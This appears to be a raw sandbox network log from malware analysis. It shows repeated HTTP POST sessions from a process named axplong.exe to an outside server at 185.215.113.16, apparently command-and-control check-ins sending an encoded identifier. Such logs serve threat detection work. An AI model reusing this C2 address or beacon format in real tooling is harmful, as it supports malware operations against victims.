26	192.168.2.4	49763	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:34.529567957 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:35.231143951 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:35.231950045 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:35.455610991 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49764	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:35.576035023 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:36.282371044 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:36.283191919 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:36.507232904 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49765	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:36.622483015 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:37.391284943 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:37.392347097 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:37.619554996 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49766	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:37.834933996 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:38.497754097 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:38.499655008 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:38.722179890 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49767	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:38.847228050 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:39.568128109 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:39.569406986 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:39.797302008 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49768	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:39.922194004 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:40.644069910 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:40.645016909 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:40.886981010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49769	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:40.997072935 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:41.704528093 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:41.705478907 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:41.931463003 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49770	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:42.044126034 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:42.802140951 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:42.803000927 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:43.035356998 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49771	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:43.153419018 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:43.863245010 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:43.864145994 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:44.096822977 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49772	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:44.215781927 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:45.382936001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:45.383049011 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:45.383140087 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:45.384099007 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:45.813618898 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49773	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:45.934837103 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:46.674652100 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:46.682538986 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:46.915173054 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49774	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:47.320979118 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:48.073731899 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:48.074771881 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:48.302282095 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49775	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:48.420288086 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:49.145576000 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
